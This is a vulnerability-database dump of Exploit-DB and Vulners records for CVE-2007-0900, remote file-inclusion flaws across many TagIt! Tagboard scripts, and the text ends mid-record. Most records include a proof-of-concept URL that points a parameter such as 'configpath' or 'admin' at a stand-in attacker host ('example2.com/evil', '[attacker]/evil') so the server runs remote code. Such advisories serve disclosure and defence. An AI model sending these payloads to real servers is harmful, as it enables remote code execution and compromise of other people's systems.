source: http://www.securityfocus.com/bid/22518/info
TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
TagBoard 2.1.b Build 2 and prior versions are vulnerable.
http://www.example.com/[TagIt_path]/CONFIG/errmsg.inc.php?configpath=http://example2.com/evil?
{"id": "EDB-ID:29580", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Tagit! Tagit2b 2.1.B Build 2 CONFIG/errmsg.inc.php configpath Parameter Remote File Inclusion", "description": "Tagit! Tagit2b 2.1.B Build 2 CONFIG/errmsg.inc.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "modified": "2007-02-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/29580/", "reporter": "K-159", "references": [], "cvelist": ["CVE-2007-0900"], "lastseen": "2016-02-03T10:38:26", "viewCount": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-02-03T10:38:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0900"]}, {"type": "osvdb", "idList": ["OSVDB:34603", "OSVDB:34618", "OSVDB:34616", "OSVDB:34617", "OSVDB:34611", "OSVDB:34615", "OSVDB:34613", "OSVDB:34612", "OSVDB:34610", "OSVDB:34614"]}, {"type": "exploitdb", "idList": ["EDB-ID:29584", "EDB-ID:29581", "EDB-ID:29589", "EDB-ID:29590", "EDB-ID:29587", "EDB-ID:29578", "EDB-ID:29588", "EDB-ID:29592", "EDB-ID:29583", "EDB-ID:29591"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7245"]}], "modified": "2016-02-03T10:38:26", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://www.exploit-db.com/download/29580/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/CONFIG/errmsg.inc.php?configpath=http://example2.com/evil?", "osvdbidlist": ["34605"]}
{"cve": [{"lastseen": "2021-02-02T05:31:21", "description": "Multiple PHP remote file inclusion vulnerabilities in TagIt! Tagboard 2.1.B Build 2 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) configpath parameter to (a) tagviewer.php, (b) tag_process.php, and (c) CONFIG/errmsg.inc.php; and (d) addTagmin.php, (e) ban_watch.php, (f) delTagmin.php, (g) delTag.php, (h) editTagmin.php, (i) editTag.php, (j) manageTagmins.php, and (k) verify.php in tagmin/; the (2) adminpath parameter to (l) tagviewer.php, (m) tag_process.php, and (n) tagmin/index.php; and the (3) admin parameter to (o) readconf.php, (p) updateconf.php, (q) updatefilter.php, and (r) wordfilter.php in tagmin/; different vectors than CVE-2006-5249.", "edition": 6, "cvss3": {}, "published": "2007-02-13T20:28:00", "title": "CVE-2007-0900", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0900"], "modified": "2017-07-29T01:30:00", "cpe": ["cpe:/a:tagit:tagboard:2.1.b_build_2"], "id": "CVE-2007-0900", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0900", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tagit:tagboard:2.1.b_build_2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! 
Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/updatefilter.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/updatefilter.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/updatefilter.php?admin=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34617", "id": "OSVDB:34617", "title": "TagIt! Tagboard (tagit2b) tagmin/updatefilter.php admin Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! 
Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/index.php script not properly sanitizing user input supplied to the 'adminpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/index.php script not properly sanitizing user input supplied to the 'adminpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/index.php?adminpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34614", "id": "OSVDB:34614", "title": "TagIt! Tagboard (tagit2b) tagmin/index.php adminpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! 
Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/updateconf.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/updateconf.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/updateconf.php?admin=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34616", "id": "OSVDB:34616", "title": "TagIt! Tagboard (tagit2b) tagmin/updateconf.php admin Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! 
Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/readconf.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/readconf.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/readconf.php?admin=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34615", "id": "OSVDB:34615", "title": "TagIt! Tagboard (tagit2b) tagmin/readconf.php admin Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! 
Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/wordfilter.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/wordfilter.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/wordfilter.php?admin=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34618", "id": "OSVDB:34618", "title": "TagIt! Tagboard (tagit2b) tagmin/wordfilter.php admin Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! 
Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/editTag.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/editTag.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/editTag.php?configpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34611", "id": "OSVDB:34611", "title": "TagIt! Tagboard (tagit2b) tagmin/editTag.php configpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! 
Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/editTagmin.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/editTagmin.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/editTagmin.php?configpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34610", "id": "OSVDB:34610", "title": "TagIt! Tagboard (tagit2b) tagmin/editTagmin.php configpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! 
Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tag_process.php script not properly sanitizing user input supplied to the 'configpath' or 'adminpath' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tag_process.php script not properly sanitizing user input supplied to the 'configpath' or 'adminpath' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tag_process.php?configpath=http://[attacker]/evil?\nhttp://[target]/[TagIt_path]/tag_process.php?adminpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34604", "id": "OSVDB:34604", "title": "TagIt! 
Tagboard (tagit2b) tag_process.php Multiple Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/verify.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/verify.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/verify.php?configpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34613", "id": "OSVDB:34613", "title": "TagIt! 
Tagboard (tagit2b) tagmin/verify.php configpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/delTag.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/delTag.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/delTag.php?configpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34609", "id": "OSVDB:34609", "title": "TagIt! 
Tagboard (tagit2b) tagmin/delTag.php configpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T10:38:57", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/delTag.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/delTag.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29584", "href": "https://www.exploit-db.com/exploits/29584/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/delTag.php?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29584/"}, {"lastseen": "2016-02-03T10:39:26", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/manageTagmins.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! 
Tagit2b 2.1.B Build 2 tagmin/manageTagmins.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29587", "href": "https://www.exploit-db.com/exploits/29587/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/manageTagmins.php?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29587/"}, {"lastseen": "2016-02-03T10:38:33", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/addTagmin.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/addTagmin.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29581", "href": "https://www.exploit-db.com/exploits/29581/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. 
\r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/addTagmin.php?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29581/"}, {"lastseen": "2016-02-03T10:40:09", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/updatefilter.php admin Parameter Remote File Inclusion. CVE-2007-0900 . Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/updatefilter.php admin Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29592", "href": "https://www.exploit-db.com/exploits/29592/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/updatefilter.php?admin=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29592/"}, {"lastseen": "2016-02-03T10:39:51", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/readconf.php admin Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! 
Tagit2b 2.1.B Build 2 tagmin/readconf.php admin Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29590", "href": "https://www.exploit-db.com/exploits/29590/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/readconf.php?admin=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29590/"}, {"lastseen": "2016-02-03T10:38:09", "description": "Tagit! Tagit2b 2.1.B Build 2 tagviewer.php Multiple Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagviewer.php Multiple Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29578", "href": "https://www.exploit-db.com/exploits/29578/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n\r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n\r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. 
\r\n\r\nhttp://www.example.com/[TagIt_path]/tagviewer.php?configpath=http://example2.com/evil?\r\nhttp://www.example.com/[TagIt_path]/tagviewer.php?adminpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29578/"}, {"lastseen": "2016-02-03T10:39:36", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/verify.php configpath Parameter Remote File Inclusion. CVE-2007-0900 . Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/verify.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29588", "href": "https://www.exploit-db.com/exploits/29588/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/verify.php?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": 